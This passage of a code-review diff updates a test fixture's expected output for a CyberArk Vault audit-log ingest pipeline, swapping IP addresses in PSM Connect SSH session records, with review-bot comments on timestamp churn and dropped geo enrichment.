\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:48:34\",\"IsoTimestamp\":\"2021-03-11T17:48:34Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -460,20 +433,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -497,7 +461,7 @@ }, "@timestamp": "2021-03-11T17:54:56.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" 
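Review bot: The `event.ingested` line in this hunk is replaced purely because the capture timestamp moved (`2021-06-09T10:24:30.936272100Z` → `2021-12-09T13:36:47.331150400Z`), so this expected file will churn every time it is regenerated; the same `-`/`+` pair appears in `@@ -554,8 +518,8 @@` and `@@ -672,8 +627,8 @@`. If the pipeline test config for this fixture does not already list `event.ingested` under `dynamic_fields`, it is worth adding so the comparison ignores the ingest time and these diffs stop carrying noise next to the IP changes. The enclosing JSON document starts and ends outside the hunk.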
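Review bot: The `destination.geo` block is removed with no `+` replacement while `destination.ip` is still populated (now `67.43.156.15`), so this fixture no longer pins geo enrichment on the destination address at all; the same drop appears in `@@ -578,20 +542,11 @@` and `@@ -696,20 +651,11 @@`. The old block's generic US centroid (`"lat": 37.751`, `"lon": -97.822`) reads like the output of a production GeoIP database rather than the deterministic test one, which may explain why the regenerated file lost it, but the commit describes the new addresses as the supported subset, so if the pipeline enriches `destination.ip` one would expect a geo object for the new IP to appear here. Please confirm whether the test database resolves `67.43.156.15` and, if it does, regenerate the expected output so the geo fields are asserted again rather than silently dropped; if enrichment on this field is intentionally out of scope for the fixture, a sentence in the PR description saying so would help the next reviewer.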
@@ -509,15 +473,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:54:56Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:54:56\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:54:56Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:54:56\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:54:56Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -530,20 +494,20 @@ "psmid": "PSMServer", "session_id": "d8ff4d32-8292-11eb-b962-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115" + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Connect", "timestamp": "Mar 11 09:54:56", "desc": "PSM Connect" 
@@ -554,8 +518,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936274800Z", - "original": "\u003c5\u003e1 2021-03-11T17:54:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:54:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:54:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:54:56\",\"IsoTimestamp\":\"2021-03-11T17:54:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331156200Z", + "original": "\u003c5\u003e1 2021-03-11T17:54:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:54:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:54:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n 
\u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:54:56\",\"IsoTimestamp\":\"2021-03-11T17:54:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -578,20 +542,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -615,7 +570,7 @@ }, "@timestamp": "2021-03-11T17:56:37.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" 
@@ -627,15 +582,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:56:37Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:56:37\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:56:37Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:56:37\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:56:37Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -648,20 +603,20 @@ "psmid": "PSMServer", "session_id": "173dd46a-8293-11eb-afcb-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115" + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Connect", "timestamp": "Mar 11 09:56:37", "desc": "PSM Connect" 
@@ -672,8 +627,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936277400Z", - "original": "\u003c5\u003e1 2021-03-11T17:56:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:37\",\"IsoTimestamp\":\"2021-03-11T17:56:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331162200Z", + "original": "\u003c5\u003e1 2021-03-11T17:56:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n 
